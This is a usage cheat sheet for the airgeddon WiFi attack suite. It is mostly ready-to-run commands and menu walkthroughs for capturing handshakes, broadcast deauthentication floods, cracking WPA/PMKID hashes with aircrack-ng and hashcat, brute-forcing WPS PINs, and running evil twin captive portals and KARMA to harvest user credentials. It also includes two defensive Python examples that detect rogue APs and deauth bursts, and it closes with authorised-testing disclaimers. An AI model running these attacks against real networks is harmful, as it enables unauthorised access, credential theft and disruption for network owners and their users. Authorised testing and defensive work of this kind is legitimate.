Installation
Prerequisites
# Debian/Ubuntu
sudo apt-get update
sudo apt-get install git curl
sudo apt-get install aircrack-ng netcat-openbsd dnsmasq hostapd
# Arch Linux
sudo pacman -S aircrack-ng openbsd-netcat dnsmasq hostapd
# Dependencies for optional features
sudo apt-get install pixiewps bully reaver hcxdumptool hashcat
Clone and Setup
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
chmod +x airgeddon.sh
sudo ./airgeddon.sh
Docker Installation
docker pull v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged -v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
Starting airgeddon
Basic Launch
# Run as root (required for monitor mode and packet injection)
sudo ./airgeddon.sh
# Run with language override
sudo ./airgeddon.sh -i es
Command-Line Options
./airgeddon.sh --help # Show help menu
./airgeddon.sh -l # List available languages
./airgeddon.sh -i [LANG] # Set interface language
./airgeddon.sh --check # Verify dependencies only
Interface Selection and Monitor Mode
WiFi Interface Selection
Main Menu → Change WiFi interface
Select your wireless adapter (wlan0, wlan1, etc.)
Enable Monitor Mode
Main Menu → Monitor Mode
↳ Enable monitor mode on selected interface
↳ System will create mon0 (or similar)
↳ Required for all scanning operations
Disable Monitor Mode
Main Menu → Monitor Mode → Disable
# Or manually:
sudo airmon-ng stop mon0
Verify Monitor Mode
# Check active interfaces
iwconfig
# Should show "Mode:Monitor"
# Interface mon0 or similar active
Network Scanning
Scan Nearby Networks
Main Menu → Scanning
↳ Explore networks around you
↳ View SSID, BSSID, Channel, Power, etc.
View Scan Results
Available columns:
SSID - Network name
BSSID - MAC address (AA:BB:CC:DD:EE:FF)
Channel - WiFi channel (1-14 or 5G)
Security - WPA2, WPA, WEP, Open
Power - Signal strength (dBm)
Clients - Connected devices
Filter Scan Results
During scan, you can:
1. Select networks by BSSID
2. Filter by channel
3. Save results to file
Handshake Capture (WPA/WPA2)
Capture WPA2 Handshake
Main Menu → Attacks → Capture handshake
1. Select target network from scan
2. Choose capture interface (mon0)
3. Let it run until "Handshake captured" message
4. Ctrl+C to stop
Deauthentication During Capture
Main Menu → Attacks → Capture handshake → Deauthentication
↳ Optional: Automatically send deauth frames
↳ Forces clients to reconnect so the handshake can be captured
↳ Choose deauth timing (delay)
Manual Handshake Capture (Advanced)
# Terminal 1: Start airodump-ng (capture packets)
sudo airodump-ng --bssid [BSSID] --channel [CH] \
--write handshake mon0
# Terminal 2: Send deauth frames (forces reconnect)
sudo aireplay-ng --deauth 0 -a [BSSID] \
-c [CLIENT_MAC] mon0
# Stop (Ctrl+C) when 4-way handshake captured
WPA/WPA2 Cracking
Dictionary Attack
Main Menu → Attacks → Crack handshake
↳ Wordlist-based cracking
1. Select handshake (.cap file)
2. Choose wordlist
- rockyou.txt (common)
- Custom wordlist
3. Start aircrack-ng
4. Wait for password discovery
Common Wordlists
# Download rockyou.txt
wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
tar -xzf rockyou.txt.tar.gz
# Use in airgeddon
# Point to wordlist path in cracking menu
Brute Force Attack
Main Menu → Attacks → Crack handshake → Brute force
↳ Character-based cracking (slower, finds unknown passwords)
1. Select handshake
2. Set character set (lowercase, uppercase, numbers, symbols)
3. Set min/max length
4. Start attack (can take hours/days)
GPU-Accelerated Cracking
# Convert .cap to hashcat format first
hcxpcapngtool -o handshake.22000 handshake.cap
# Use hashcat (requires GPU)
hashcat -m 22000 handshake.22000 rockyou.txt
Evil Twin / Rogue AP Attacks
Create Evil Twin (Basic)
Main Menu → Attacks → Evil Twin
1. Scan and select target network
2. Create fake SSID (clone or custom)
3. Set up DHCP server
4. Start hostapd (rogue AP)
5. Optional: Enable DNS spoofing
Evil Twin with Captive Portal
Main Menu → Attacks → Evil Twin → With Captive Portal
1. Select target SSID
2. Configure captive portal page
3. Set redirect URL
4. Start malicious AP
5. Capture credentials from users
Evil Twin Configuration
Configure before launch:
Interface - mon0 or AP interface
SSID - Network name (can clone target)
Channel - Match target channel
Encryption - WPA2 or Open
DHCP Range - IP address pool (192.168.1.0/24)
Gateway IP - 192.168.1.1
DNS - Redirect to custom page
Stop Evil Twin
Main Menu → Stop attacks
↳ Kill hostapd and dnsmasq
↳ Restore network settings
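Defender-side check for the clone settings listed above (same SSID, matching channel, WPA2 or Open), as an added example that is not part of the original cheat sheet or of airgeddon. The AP inventory, the scan rows and the function name are constructed assumptions.

```python
from collections import namedtuple

# One scan row, using the columns the scan view lists.
Row = namedtuple("Row", "ssid bssid channel security power")

# Assumed inventory of the access points you operate (constructed values).
KNOWN_APS = {
    "CorpNet": {
        "AA:BB:CC:00:00:01": {"channel": 6, "security": "WPA2"},
        "AA:BB:CC:00:00:02": {"channel": 11, "security": "WPA2"},
    },
}

# Constructed scan results, not a real capture.
SCAN = [
    Row("CorpNet", "AA:BB:CC:00:00:01", 6, "WPA2", -48),
    Row("CorpNet", "AA:BB:CC:00:00:02", 11, "WPA2", -61),
    Row("CorpNet", "DE:AD:BE:EF:00:99", 6, "Open", -30),    # unknown radio, no encryption
    Row("CorpNet", "AA:BB:CC:00:00:02", 1, "WPA2", -35),    # known BSSID, wrong channel
    Row("CoffeeShop", "11:22:33:44:55:66", 1, "Open", -70), # not ours, ignored
]

def find_rogue_aps(scan, known):
    """Return (bssid, reason) for every row that contradicts the inventory."""
    findings = []
    for row in scan:
        aps = known.get(row.ssid)
        if aps is None:
            continue  # SSID is not one we operate
        expected = aps.get(row.bssid.upper())
        if expected is None:
            reason = "unknown BSSID advertising our SSID"
            if row.security == "Open":
                reason += " with encryption removed"
            findings.append((row.bssid, reason))
        elif row.security != expected["security"]:
            findings.append((row.bssid, "security differs from inventory"))
        elif row.channel != expected["channel"]:
            # Only meaningful when channels are pinned; auto-channel APs move legitimately.
            findings.append((row.bssid, "known BSSID on unexpected channel (possible spoof)"))
    return findings

if __name__ == "__main__":
    for bssid, reason in find_rogue_aps(SCAN, KNOWN_APS):
        print(bssid, "-", reason)
```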
WPS Attacks
WPS Reaver Attack (PIN Brute Force)
Main Menu → Attacks → WPS attacks → Reaver
1. Select target network
2. Enable Reaver
3. Start PIN guessing (up to 10,000 combinations)
4. Takes ~4-10 hours
5. On success: recovers WiFi password directly
WPS Bully Attack
Main Menu → Attacks → WPS attacks → Bully
↳ Faster WPS cracking alternative
1. Select target
2. Choose BULLY mode
3. More efficient on some routers
4. Fewer requests than Reaver
Pixie Dust Attack (WPS Shortcut)
Main Menu → Attacks → WPS attacks → Pixie Dust
↳ MUCH faster (minutes vs hours)
1. Select vulnerable router
2. Start Pixie Dust
3. Recovers WPS PIN in minutes
4. PIN = WiFi password
Check WPS Status
# Before attack:
sudo wash -i mon0 # find the row for [BSSID]
# Shows:
# - WPS version
# - Lock status
# - Vulnerability indicators
DoS and Deauthentication Attacks
Deauthentication Attack
Main Menu → Attacks → Deauth/DoS
1. Select target BSSID
2. Choose client MAC (or broadcast)
3. Set frame count (0 = infinite)
4. Start attack
5. Disconnects all clients from network
Deauth Specific Client
# Terminal method:
sudo aireplay-ng --deauth 100 \
-a [TARGET_BSSID] \
-c [CLIENT_MAC] mon0
Deauth All Clients
# Broadcast deauth to all clients:
sudo aireplay-ng --deauth 0 \
-a [TARGET_BSSID] mon0
Packet Injection Test
# Verify AP accepts injected frames:
sudo aireplay-ng --test -a [BSSID] mon0
# Required for deauth attacks to work
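Detection logic for the deauthentication bursts described in this section, as an added example that is not part of the original cheat sheet or of airgeddon. The frame records, the window and threshold values and the function name are constructed assumptions; a real sensor would feed it management frames parsed from a monitor-mode capture.

```python
from collections import defaultdict, deque

BROADCAST = "FF:FF:FF:FF:FF:FF"

# Constructed records: (seconds, subtype, bssid, destination). Not a real capture.
FRAMES = (
    [(0.0, "beacon", "AA:BB:CC:00:00:01", BROADCAST),
     (1.0, "deauth", "AA:BB:CC:00:00:01", "10:20:30:40:50:60")]  # single frame, normal
    + [(5.0 + i * 0.1, "deauth", "AA:BB:CC:00:00:02", BROADCAST)
       for i in range(30)]                                        # broadcast burst
    + [(20.0 + i * 0.05, "deauth", "AA:BB:CC:00:00:03", "10:20:30:40:50:61")
       for i in range(40)]                                        # burst at one client
)

def detect_deauth_floods(frames, window=2.0, threshold=10):
    """Flag BSSIDs whose deauth count within `window` seconds reaches `threshold`."""
    recent = defaultdict(deque)  # bssid -> timestamps of deauths inside the window
    alerts = {}
    for ts, subtype, bssid, dst in sorted(frames):
        if subtype != "deauth":
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop timestamps that fell out of the sliding window
        if len(q) >= threshold and bssid not in alerts:
            kind = "broadcast" if dst.upper() == BROADCAST else "targeted at " + dst
            alerts[bssid] = {"first_seen": q[0], "kind": kind}
    return alerts

if __name__ == "__main__":
    for bssid, info in detect_deauth_floods(FRAMES).items():
        print(bssid, info["kind"], "burst starting at", info["first_seen"])
```

Enabling 802.11w Protected Management Frames on the AP and clients makes clients discard forged deauthentication frames, so this alert is most useful on networks where PMF cannot yet be required.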
PMKID Attack (WPA3/WPA2)
PMKID Capture
Main Menu → Attacks → PMKID attacks
1. Select target network
2. Start PMKID sniffing
3. Capture PMKID from probe requests
4. No client reconnection needed
PMKID Cracking
Main Menu → Attacks → PMKID attacks → Crack
1. Select captured PMKID file
2. Choose wordlist
3. Start hashcat (GPU preferred)
4. Faster than 4-way handshake
# Capture PMKID packets
sudo hcxdumptool -i mon0 -o pmkid.pcapng --disable-status
# Convert to hashcat format
hcxpcapngtool -o pmkid.22000 pmkid.pcapng
# Crack
hashcat -m 22000 pmkid.22000 wordlist.txt
Enterprise Network Attacks
WPA-Enterprise (802.1X) Attacks
Main Menu → Attacks → Enterprise networks
↳ Requires username/password knowledge
1. Capture RADIUS handshakes
2. Set up fake RADIUS server
3. Create evil twin of enterprise AP
4. Redirect clients to fake auth
KARMA Attack (Evil Twin Beacon)
Main Menu → Attacks → KARMA
1. Listen for probe requests
2. Echo back any SSID clients probe for
3. Clients auto-connect to fake network
4. Capture credentials
Main Menu Structure
airgeddon
├── Change WiFi interface
├── Monitor Mode (Enable/Disable)
├── Scanning
├── Attacks
│ ├── Capture handshake
│ ├── Crack handshake
│ ├── Evil Twin
│ ├── WPS attacks
│ ├── Deauth/DoS
│ ├── PMKID attacks
│ └── Enterprise attacks
├── Tools
│ ├── Packet injection test
│ ├── Traffic monitoring
│ └── Check dependencies
├── Language selection
└── Exit
Quick Navigation Tips
• Use arrow keys / numbers to select
• Press Enter to confirm
• Ctrl+C to cancel/go back
• Follow prompts for each attack
• Monitor windows show real-time progress
Dependencies and Requirements
aircrack-ng # Core WiFi cracking suite
netcat # Network utilities
dnsmasq # DHCP/DNS server
hostapd # AP emulation
iw # WiFi interface control
reaver # WPS PIN cracking
bully # WPS alternative
pixiewps # Pixie Dust attacks
hcxdumptool # PMKID capture
hashcat # GPU cracking
mdk3 # Advanced DoS
macchanger # MAC spoofing
Verify Dependencies
# Run built-in checker
sudo ./airgeddon.sh --check
# Manual verification
which aircrack-ng
which hostapd
which reaver
Docker Usage
Pull and Run
docker pull v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged \
-v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
Docker with Host Network
docker run -it --privileged --net host \
-v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
Mount Local Wordlist
docker run -it --privileged \
-v ~/wordlists:/root/wordlists \
v1s1t0r1sh3r3/airgeddon:latest
Troubleshooting
Monitor Mode Won’t Enable
# Find and kill processes that conflict with monitor mode
sudo airmon-ng check kill
# Force interface down and restart
sudo ip link set wlan0 down
sudo airmon-ng start wlan0
No Networks Detected
# Verify monitor mode active
iwconfig | grep Monitor
# Check antenna
sudo iw list | grep -i antenna
# Try different channel range
# Some adapters don't scan 5GHz by default
Handshake Capture Fails
# Increase deauth attempts
sudo aireplay-ng --deauth 50 -a [BSSID] mon0
# Check channel matches
sudo iwconfig mon0
# Verify adapter supports injection
sudo aireplay-ng --test -a [BSSID] mon0
WPS Attack Not Working
# Verify target supports WPS
sudo wash -i mon0 # find the row for [BSSID]
# Some routers lock WPS (try Pixie Dust first)
# Check for rate limiting/lockout status
Evil Twin Connection Issues
# Check DHCP logs
tail -f /var/log/dnsmasq.log
# Verify hostapd running
ps aux | grep hostapd
# Enable IP forwarding
sudo sysctl net.ipv4.ip_forward=1
Legal and Ethical Notes
⚠️ Only use on networks you own or have explicit permission to test
⚠️ Unauthorized network access is illegal in most jurisdictions
⚠️ Use for authorized penetration testing and security research only
⚠️ Always obtain written authorization before testing
Resources